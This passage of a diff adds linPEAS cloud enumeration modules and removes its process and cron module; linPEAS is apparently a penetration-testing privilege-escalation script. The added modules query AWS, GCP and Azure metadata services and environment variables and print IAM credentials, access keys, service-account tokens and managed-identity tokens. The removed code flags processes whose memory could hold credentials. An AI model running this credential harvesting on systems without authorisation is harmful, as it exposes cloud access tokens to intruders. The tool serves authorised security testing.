 # Global Variables: $aws_ecs_metadata_uri, $aws_ecs_service_account_uri, $is_aws_ecs
 # Initial Functions: check_aws_ecs
 # Generated Global Variables: $aws_ecs_req
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_aws_ecs" = "Yes" ]; then
    print_2title "AWS ECS Enumeration"
    aws_ecs_req=""
    if [ "$(command -v curl || echo -n '')" ]; then
        aws_ecs_req='curl -s -f'
    elif [ "$(command -v wget || echo -n '')" ]; then
        aws_ecs_req='wget -q -O -'
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$aws_ecs_metadata_uri" ]; then
        print_3title "Container Info"
        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
        echo ""
        print_3title "Task Info"
        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
        echo ""
    else
        echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
    fi
    if [ "$aws_ecs_service_account_uri" ]; then
        print_3title "IAM Role"
        exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
        echo ""
    else
        echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
    fi
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/4_AWS_Lambda.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/4_AWS_Lambda.sh
@ -0,0 +1,27 @@
 # Title: Cloud - AWS Lambda
 # ID: CL_AWS_Lambda
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: AWS Lambda Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_aws_lambda, print_2title
 # Global Variables: $is_aws_lambda
 # Initial Functions: check_aws_lambda
 # Generated Global Variables: 
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$is_aws_lambda" = "Yes" ]; then
  print_2title "AWS Lambda Enumeration"
  printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
  printf "Region: "; env | grep AWS_REGION
  printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
  printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
  printf "Session token: "; env | grep AWS_SESSION_TOKEN
  printf "Security token: "; env | grep AWS_SECURITY_TOKEN
  printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/5_AWS_Codebuild.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/5_AWS_Codebuild.sh
@ -0,0 +1,40 @@
 # Title: Cloud - AWS Codebuild
 # ID: CL_AWS_Codebuild
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: AWS Codebuild Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_aws_codebuild, exec_with_jq, print_2title, print_3title
 # Global Variables: $is_aws_codebuild
 # Initial Functions: check_aws_codebuild
 # Generated Global Variables: $aws_req, $METADATA_URL, $CREDS_PATH, $URL_CREDS
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$is_aws_codebuild" = "Yes" ]; then
  print_2title "AWS Codebuild Enumeration"
  aws_req=""
  if [ "$(command -v curl || echo -n '')" ]; then
      aws_req="curl -s -f"
  elif [ "$(command -v wget || echo -n '')" ]; then
      aws_req="wget -q -O -"
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
      echo "The addresses are in /codebuild/output/tmp/env.sh"
  fi
  if [ "$aws_req" ]; then
    print_3title "Credentials"
    CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
    URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
    exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
    print_3title "Container Info"
    METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
    exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_function.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_function.sh
@ -0,0 +1,57 @@
 # Title: Cloud - Google Cloud Function
 # ID: CL_Google_cloud_function
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Google Cloud Function Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_gcp, print_2title, print_3title, print_info
 # Global Variables: $is_gcp_function, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
 # Initial Functions: check_gcp
 # Generated Global Variables: $gcp_req, $p_id, $p_num, $inst_id, $inst_zone, $mtls_info
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_gcp_function" = "Yes" ]; then
    gcp_req=""
    if [ "$(command -v curl)" ]; then
        gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
    elif [ "$(command -v wget)" ]; then
        gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    # GCP Enumeration
    if [ "$gcp_req" ]; then
        print_2title "Google Cloud Platform Enumeration"
        print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
        ## GC Project Info
        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
        [ "$p_id" ] && echo "Project-ID: $p_id"
        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
        [ "$p_num" ] && echo "Project Number: $p_num"
        # Instance Info
        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
        [ "$inst_id" ] && echo "Instance ID: $inst_id"
        mtls_info=$(eval $gcp_req http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration)
        [ "$mtls_info" ] && echo "MTLS info: $mtls_info"
        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
        [ "$inst_zone" ] && echo "Zone: $inst_zone"
        echo ""
        print_3title "Service Accounts"
        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
            echo "  Name: $sa"
            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}email")
            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}aliases")
            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}identity")
            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}token")
            echo "  ==============  "
        done
    fi
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/7_Google_cloud_vm.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/7_Google_cloud_vm.sh
@ -0,0 +1,111 @@
 # Title: Cloud - Google Cloud VM
 # ID: CL_Google_cloud_vm
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Google Cloud VM Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_gcp, print_2title, print_3title, print_info
 # Global Variables: $is_gcp_vm, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
 # Initial Functions: check_gcp
 # Generated Global Variables: $gcp_req, $p_id, $p_num, $pssh_k, $p_attrs, $osl_u, $osl_g, $osl_sk, $osl_au, $inst_d, $inst_hostn, $inst_id, $inst_img, $inst_mt, $inst_n, $inst_tag, $inst_zone, $inst_k8s_loc, $inst_k8s_name, $inst_k8s_osl_e, $inst_k8s_klab, $inst_k8s_kubec, $inst_k8s_kubenv, $iface
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_gcp_vm" = "Yes" ]; then
    gcp_req=""
    if [ "$(command -v curl || echo -n '')" ]; then
        gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
    elif [ "$(command -v wget || echo -n '')" ]; then
        gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$gcp_req" ]; then
        print_2title "Google Cloud Platform Enumeration"
        print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
        ## GC Project Info
        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
        [ "$p_id" ] && echo "Project-ID: $p_id"
        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
        [ "$p_num" ] && echo "Project Number: $p_num"
        pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
        [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
        p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
        [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
        # OSLogin Info
        osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
        [ "$osl_u" ] && echo "OSLogin users: $osl_u"
        osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
        [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
        osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
        [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
        osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
        [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
        # Instance Info
        inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
        [ "$inst_d" ] && echo "Instance Description: "
        inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
        [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
        [ "$inst_id" ] && echo "Instance ID: $inst_id"
        inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
        [ "$inst_img" ] && echo "Instance Image: $inst_img"
        inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
        [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
        inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
        [ "$inst_n" ] && echo "Instance Name: $inst_n"
        inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
        [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
        [ "$inst_zone" ] && echo "Zone: $inst_zone"
        inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
        [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
        inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
        [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
        inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
        [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
        inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
        [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
        inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
        [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
        inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
        [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
        echo ""
        print_3title "Interfaces"
        for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 
            echo "  IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
            echo "  Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
            echo "  Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
            echo "  DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
            echo "  Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
            echo "  ==============  "
        done
        echo ""
        print_3title "User Data"
        echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
        echo ""
        echo ""
        print_3title "Service Accounts"
        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
            echo "  Name: $sa"
            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
            echo "  ==============  "
        done
    fi
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/8_Azure_VM.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/8_Azure_VM.sh
@ -0,0 +1,70 @@
 # Title: Cloud - Azure VM
 # ID: CL_Azure_VM
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Azure VM Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_az_vm, exec_with_jq, print_2title, print_3title
 # Global Variables: $is_az_vm
 # Initial Functions: check_az_vm
 # Generated Global Variables: $API_VERSION, $HEADER, $az_req, $URL
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_az_vm" = "Yes" ]; then
  print_2title "Azure VM Enumeration"
  HEADER="Metadata:true"
  URL="http://169.254.169.254/metadata"
  API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
  az_req=""
  if [ "$(command -v curl || echo -n '')" ]; then
      az_req="curl -s -f -L -H '$HEADER'"
  elif [ "$(command -v wget || echo -n '')" ]; then
      az_req="wget -q -O - --header '$HEADER'"
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$az_req" ]; then
    print_3title "Instance details"
    exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
    echo ""
    print_3title "Load Balancer details"
    exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
    echo ""
    print_3title "User Data"
    exec_with_jq eval $az_req "$URL/instance/compute/userData?api-version=$API_VERSION\&format=text" | base64 -d 2>/dev/null
    echo ""
    print_3title "Custom Data and other configs (root needed)"
    (cat /var/lib/waagent/ovf-env.xml || cat /var/lib/waagent/CustomData/ovf-env.xml) 2>/dev/null | sed "s,CustomData.*,${SED_RED},"
    echo ""
    print_3title "Management token"
    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
    echo ""
    print_3title "Graph token"
    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
    echo ""
    print_3title "Vault token"
    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
    echo ""
    print_3title "Storage token"
    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
    echo ""
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/9_Azure_app_service.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/9_Azure_app_service.sh
@ -0,0 +1,46 @@
 # Title: Cloud - Azure App Service 
 # ID: CL_Azure_app_service
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Azure App Service Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_az_app, exec_with_jq, print_2title, print_3title
 # Global Variables: $is_az_app,
 # Initial Functions: check_az_app
 # Generated Global Variables: $API_VERSION, $HEADER, $az_req
 # Fat linpeas: 0
 # Small linpeas: 0
 API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
 if [ "$is_az_app" = "Yes" ]; then
  print_2title "Azure App Service Enumeration"
  HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
  az_req=""
  if [ "$(command -v curl || echo -n '')" ]; then
      az_req="curl -s -f -L -H '$HEADER'"
  elif [ "$(command -v wget || echo -n '')" ]; then
      az_req="wget -q -O - --header '$HEADER'"
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$az_req" ]; then
    print_3title "Management token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
    echo
    print_3title "Graph token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
    echo
    print_3title "Vault token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
    echo
    print_3title "Storage token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
@ -1,380 +0,0 @@
 ####################################################
 #-----) Processes & Cron & Services & Timers (-----#
 ####################################################
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Cleaned proccesses
  print_2title "Cleaned processes"
  if [ "$NOUSEPS" ]; then
    printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
  fi
  print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
  if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
    echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
  fi
  if [ "$NOUSEPS" ]; then
    print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
    pslist=$(print_ps)
  else
    (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
      echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
      if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then
        cpid=$(echo "$psline" | awk '{print $2}')
        caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
        if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
          printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
        fi
      fi
    done
    pslist=$(ps auxwww)
    echo ""
    #-- PCS) Binary processes permissions
    print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
    binW="IniTialiZZinnggg"
    ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
      if [ -w "$bpath" ]; then
        binW="$binW|$bpath"
      fi
    done
    ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
  fi
  echo ""
 fi
 CURRENT_USER_PIVOT_PID=""
 if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
  #-- PCS) Process opened by other users
  print_2title "Processes whose PPID belongs to a different user (not root)"
  print_info "You will know if a user can somehow spawn processes as a different user"
  # Function to get user by PID
  get_user_by_pid() {
    ps -p "$1" -o user | grep -v "USER"
  }
  # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
  ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do
    if [ "$ppid" = "0" ]; then
      continue
    fi
    ppid_user=$(get_user_by_pid "$ppid")
    if echo "$user" | grep -Eqv "$ppid_user|root$"; then
      echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
      if [ "$ppid_user" = "$USER" ]; then
        CURRENT_USER_PIVOT_PID="$ppid"
      fi
    fi
  done
  echo ""
 fi
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Files opened by processes belonging to other users
  if ! [ "$IAMROOT" ]; then
    print_2title "Files opened by processes belonging to other users"
    print_info "This is usually empty because of the lack of privileges to read other user processes information"
    lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
    echo ""
  fi
 fi
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Processes with credentials inside memory
  print_2title "Processes with credentials in memory (root req)"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
  if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
  if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
  if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
  if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
  if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
  if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
  echo ""
 fi
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Different processes 1 min
  if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
    print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
    temp_file=$(mktemp)
    if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
      for i in $(seq 1 1210); do 
        ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
      done;
      sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
      rm "$temp_file";
    fi
    echo ""
  fi
 fi
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Cron
  print_2title "Cron jobs"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
  command -v crontab 2>/dev/null || echo_not_found "crontab"
  crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
  command -v incrontab 2>/dev/null || echo_not_found "incrontab"
  incrontab -l 2>/dev/null
  ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
  cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
  crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
  ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
  atq 2>/dev/null
 else
  print_2title "Cron jobs"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
  find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
 fi
 echo ""
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  if [ "$MACPEAS" ]; then
    print_2title "Third party LaunchAgents & LaunchDemons"
    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
    ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
    echo ""
    print_2title "Writable System LaunchAgents & LaunchDemons"
    find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
      program=""
      program=$(defaults read "$f" Program 2>/dev/null)
      if ! [ "$program" ]; then
